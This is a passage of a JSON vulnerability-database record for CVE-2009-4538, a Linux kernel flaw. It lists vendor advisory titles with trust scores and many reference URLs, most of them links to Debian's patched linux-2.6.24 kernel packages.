        "title": "RHSA-2010:0053",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2010-0053.html"
      },
      {
        "title": "RHSA-2010:0079",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2010-0079.html"
      },
      {
        "title": "RHSA-2010:0111",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2010-0111.html"
      },
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20100020 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20100111 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20100019 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20100053 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20100342 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20100148 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20100079 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20100149 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20100146 - security advisory"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-source-2.6.15 vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-894-1"
      },
      {
        "title": "Debian Security Advisories: DSA-2005-1 linux-2.6.24 -- privilege escalation/denial of service/sensitive memory leak",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=730b40b3a3f2a9a1f3cba6257e5248fb"
      },
      {
        "title": "VMware Security Advisories: ESXi utilities and ESX Service Console third party updates",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=vmware_security_advisories\u0026qid=9ca0d654a28a118d1f99d0ae3b1753e8"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2009-4538"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001006"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-noinfo",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2009-4538"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.6,
        "url": "http://www.securityfocus.com/bid/37523"
      },
      {
        "trust": 2.6,
        "url": "http://securitytracker.com/id?1023420"
      },
      {
        "trust": 2.6,
        "url": "http://secunia.com/advisories/38031"
      },
      {
        "trust": 2.1,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=551214"
      },
      {
        "trust": 1.8,
        "url": "http://www.openwall.com/lists/oss-security/2009/12/28/1"
      },
      {
        "trust": 1.8,
        "url": "http://www.openwall.com/lists/oss-security/2009/12/29/2"
      },
      {
        "trust": 1.8,
        "url": "http://www.openwall.com/lists/oss-security/2009/12/31/1"
      },
      {
        "trust": 1.8,
        "url": "http://www.redhat.com/support/errata/rhsa-2010-0019.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.redhat.com/support/errata/rhsa-2010-0020.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.redhat.com/support/errata/rhsa-2010-0041.html"
      },
      {
        "trust": 1.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2010-0095.html"
      },
      {
        "trust": 1.2,
        "url": "http://www.debian.org/security/2010/dsa-1996"
      },
      {
        "trust": 1.2,
        "url": "http://www.debian.org/security/2010/dsa-2005"
      },
      {
        "trust": 1.2,
        "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-february/035159.html"
      },
      {
        "trust": 1.2,
        "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2010:066"
      },
      {
        "trust": 1.2,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a7016"
      },
      {
        "trust": 1.2,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a9702"
      },
      {
        "trust": 1.2,
        "url": "http://www.redhat.com/support/errata/rhsa-2010-0053.html"
      },
      {
        "trust": 1.2,
        "url": "http://www.redhat.com/support/errata/rhsa-2010-0111.html"
      },
      {
        "trust": 1.2,
        "url": "http://secunia.com/advisories/38276"
      },
      {
        "trust": 1.2,
        "url": "http://secunia.com/advisories/38296"
      },
      {
        "trust": 1.2,
        "url": "http://secunia.com/advisories/38492"
      },
      {
        "trust": 1.2,
        "url": "http://secunia.com/advisories/38610"
      },
      {
        "trust": 1.2,
        "url": "http://secunia.com/advisories/38779"
      },
      {
        "trust": 1.2,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2010-01/msg00005.html"
      },
      {
        "trust": 1.2,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2010-01/msg00008.html"
      },
      {
        "trust": 1.2,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2010-02/msg00002.html"
      },
      {
        "trust": 1.2,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2010-02/msg00005.html"
      },
      {
        "trust": 1.2,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2010-03/msg00000.html"
      },
      {
        "trust": 1.2,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/55645"
      },
      {
        "trust": 0.9,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4538"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2009-4538"
      },
      {
        "trust": 0.8,
        "url": "http://secunia.com/advisories/35265"
      },
      {
        "trust": 0.6,
        "url": "http://support.avaya.com/css/p8/documents/100072895"
      },
      {
        "trust": 0.6,
        "url": "http://www.nsfocus.net/vulndb/14332"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4536"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4538"
      },
      {
        "trust": 0.3,
        "url": "http://www.kernel.org/pub/linux/kernel/v2.6/changelog-2.6.32.8"
      },
      {
        "trust": 0.3,
        "url": "http://www.kernel.org/"
      },
      {
        "trust": 0.3,
        "url": "http://permalink.gmane.org/gmane.comp.security.oss.general/2459"
      },
      {
        "trust": 0.3,
        "url": "http://support.avaya.com/css/p8/documents/100141285"
      },
      {
        "trust": 0.3,
        "url": "http://www.ubuntu.com/usn/usn-894-1"
      },
      {
        "trust": 0.3,
        "url": "http://rhn.redhat.com/errata/rhsa-2010-0111.html"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0291"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0003"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0007"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4020"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3080"
      },
      {
        "trust": 0.2,
        "url": "http://www.debian.org/security/faq"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2695"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4308"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/"
      },
      {
        "trust": 0.2,
        "url": "http://www.debian.org/security/"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3726"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0415"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4138"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0410"
      },
      {
        "trust": 0.2,
        "url": "http://packages.debian.org/\u003cpkg\u003e"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4021"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2010:0020"
      },
      {
        "trust": 0.1,
        "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=19693"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/894-1/"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-arm_2.6.24-6~etchnhalf.9etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.9etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2691"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-manual-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.9etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.9etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-support-2.6.24-etchnhalf.1_2.6.24-6~etchnhalf.9etch3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-sparc_2.6.24-6~etchnhalf.9etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-i386_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.9etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3889"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4005"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-s390_2.6.24-6~etchnhalf.9etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.9etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mips_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-source-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.9etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-alpha_2.6.24-6~etchnhalf.9etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.9etch3.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.9etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.9etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mipsel_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.9etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-patch-debian-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.9etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.9etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.9etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.9etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.9etch3.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-tree-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.9etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.9etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-powerpc_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.9etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-amd64_2.6.24-6~etchnhalf.9etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.9etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.9etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.9etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.9etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-doc-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-hppa_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
